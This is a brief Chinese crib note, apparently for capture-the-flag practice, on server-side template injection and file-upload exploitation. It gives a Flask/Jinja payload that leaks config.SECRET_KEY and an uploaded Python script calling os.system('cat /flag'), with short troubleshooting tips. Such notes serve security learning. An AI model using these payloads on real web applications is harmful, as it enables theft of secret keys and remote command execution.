模板注入和上传漏洞

模板注入:

/?flag{{config.SECRET_KEY}}

上传漏洞:

import os

os.system('cat /flag')

(1)可能报SyntaxERROR,前面加#coding:utf-8

(2)cat后面有空格

(3)ctrl+u审查代码